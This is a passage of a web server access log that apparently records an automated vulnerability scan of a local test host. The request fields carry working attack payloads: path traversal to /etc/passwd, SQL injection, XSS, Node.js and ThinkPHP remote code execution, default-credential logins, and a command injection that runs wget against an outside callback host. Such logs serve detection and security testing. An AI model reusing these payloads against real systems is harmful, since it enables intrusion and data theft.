/run.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /___graphql HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/altair/images/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0):: HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /package-lock.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_something_.cfm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tcpconfig.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca28fg0smpvbd3qg07h0nzr1beiiemhjs.oast.live #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"wsecure_action=update&publish=\x22;} header(\x22Nuclei: CVE-2016-10960\x22); class WSecureConfig2 {var $test=\x22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/wsecure/wsecure-config.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pacs/login.php?message=%3Cimg%20src=%22%22%20onerror=%22alert(1);%22%3E1%3C/img%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /authorization.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?url=http://example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/get_device_details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/assets/base/home.html", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?s=index/think\x5Capp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/servlet/mstrWeb HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F29KD1yzxsIZilGp7qGMxpENJnnG.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /checkValid HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"_charset_=utf-8&j_username=grios&j_password=password&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backup.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /altair HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmldata?item=all HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pages/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /embed.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/login.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"ajax=WLANScanSSID&iehack=&Scan=Scan&netnumber=1&2=link&3=3&ssid=\x22'; wget http://ca28fg0smpvbd3qg07h045hhwt7nff5i9.oast.live #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST / HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/welcome HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"{\x22id\x22:\x22insecure-firebase-database\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"PUT /29KD1ueJFJspfjxMqp9QWTDNJWH.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"PUT", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/info.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /en-US/splunkd/__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/weblogin.cgi?username=admin';cat /etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"157","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/css/29KD1yzxsIZilGp7qGMxpENJnnG.css HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"_charset_=utf-8&j_username=replication-receiver&j_password=replication-receiver&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /compile.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/cask/graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console-selfservice/SelfService.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dashboard/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?dev HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/external/7.0/system.System.get_infos HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /modules/system/assets/js/framework.combined-min.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /29KD1ueJFJspfjxMqp9QWTDNJWH.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /CFIDE/debug/cf_debugFr.cfm?userPage=javascript:alert(1) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /__raw/services/server/info/server-info?output_mode=json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.046","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /MicroStrategy HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/admin/master/console/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"_charset_=utf-8&j_username=vgnadmin&j_password=vgnadmin&j_validate=true","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /libs/granite/core/content/login.html/j_security_check HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"http://127.0.0.1/libs/granite/core/content/login.html", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:44:42 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /env.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", 